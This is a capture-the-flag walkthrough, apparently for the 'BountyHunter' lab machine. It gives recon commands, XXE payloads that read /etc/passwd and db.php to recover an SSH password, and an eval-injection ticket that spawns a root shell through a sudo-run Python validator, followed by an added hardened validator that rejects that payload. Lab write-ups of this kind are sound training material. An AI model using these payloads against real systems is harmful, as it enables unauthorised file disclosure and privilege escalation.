Recon:
nmap -sT -sV -v <bountyhunter ip>. The only relevant information is the open ports: 22 and 80.
gobuster dir -x .php,.txt,.html -u <bountyhunter ip> -w <path/to/dict>. Relevant files: "db.php" and "portal.php" (the latter can also be reached via the homepage menu).
Check out the homepage, click "portal" in the menu, then click "here" to go to the "Bounty Report System".
XXE Exploit:
The web app is vulnerable to a simple XXE attack. Encode the following data in base64, then once more in URL encoding. Passing the resulting string as a POST parameter named "data" to the file "tracker_diRbPr00f314.php" results in the page dumping the contents of "/etc/passwd":
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE hack [<!ENTITY mike SYSTEM "file:///etc/passwd">]>
<bugreport>
<title>&mike;</title>
</bugreport>
Through this file we find the "development" user.
Getting User:
Using the same exploit, but a different payload, allows us to extract the contents of the previously discovered "db.php" file:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE hack [<!ENTITY mike SYSTEM "php://filter/convert.base64-encode/resource=db.php">]>
<bugreport>
<title>&mike;</title>
</bugreport>
Now decode the returned base64 to retrieve a password. This password is used to SSH into the server as the previously obtained "development" user. Running cat user.txt prints the user flag.
Getting Root:
Running ls shows a file "contract.txt", whose contents indicate that we have "permissions" to test a specific tool. Running sudo -l shows the tool's path and that we can run it with sudo using Python 3.8. At some point in the code, the tool evaluates a specific line of a user-supplied file. This file must adhere to specific rules. The following content can be saved under any name with the extension ".md":
# Skytrain Inc
## Ticket to
__Ticket Code:__
**4+0 and exec('import pty; pty.spawn(\"/bin/bash\")')
NOTE: The "Ticket to" line MUST end with a single space, or the tool will reject the file.
Running the following command and passing it the exploit filename grants a root shell: sudo python3.8 /opt/skytrain_inc/ticketValidator.py. Printing the contents of "root.txt" gives the root flag.
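For contrast, here is an added example of how the same ticket format can be validated without the root-shell bug; it is not part of this walkthrough or of the box's own ticketValidator.py. The header checks and function names are assumptions modelled on the layout above; the point is that the "**" line is parsed as integers with a strict regex instead of being evaluated, so the payload line is rejected before anything runs.

```python
import re
import sys

# Added example (not the box's /opt/skytrain_inc/ticketValidator.py): a hardened
# validator for the same four-line ticket layout. The original tool evaluates the
# "**" line as Python, which is the root-shell bug above; here that line is matched
# by a strict regex and summed with integer arithmetic, so user text is never executed.
# The exact header checks are assumptions modelled on the walkthrough's layout.

CODE_LINE = re.compile(r"^\*\*(\d+)\+(\d+)$")  # only "**<int>+<int>" is accepted


def validate_ticket_text(text: str) -> tuple[bool, str]:
    """Return (accepted, reason). Never evaluates any part of the ticket."""
    lines = text.splitlines()
    if len(lines) < 4:
        return False, "ticket needs at least four lines"
    if lines[0] != "# Skytrain Inc":
        return False, "bad header line"
    # The tool in the walkthrough insists on a trailing space after "Ticket to".
    if not lines[1].startswith("## Ticket to ") or not lines[1].endswith(" "):
        return False, "destination line must end with a single space"
    if lines[2] != "__Ticket Code:__":
        return False, "missing ticket code header"
    match = CODE_LINE.match(lines[3])
    if match is None:
        # "**4+0 and exec(...)" fails here instead of ever reaching eval()
        return False, "ticket code must be '**<digits>+<digits>'"
    code = int(match.group(1)) + int(match.group(2))
    return True, f"ticket code {code}"


# Constructed sample inputs, not captured from the box.
VALID_TICKET = "# Skytrain Inc\n## Ticket to Berlin \n__Ticket Code:__\n**4+0\n"
INJECTED_TICKET = (
    "# Skytrain Inc\n## Ticket to Berlin \n__Ticket Code:__\n"
    "**4+0 and exec('import pty; pty.spawn(\"/bin/bash\")')\n"
)


def main(argv: list[str]) -> int:
    for path in argv[1:]:
        with open(path, encoding="utf-8") as fh:
            accepted, reason = validate_ticket_text(fh.read())
        print(f"{path}: {'accepted' if accepted else 'rejected'} ({reason})")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```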
Date created: 2021.08.20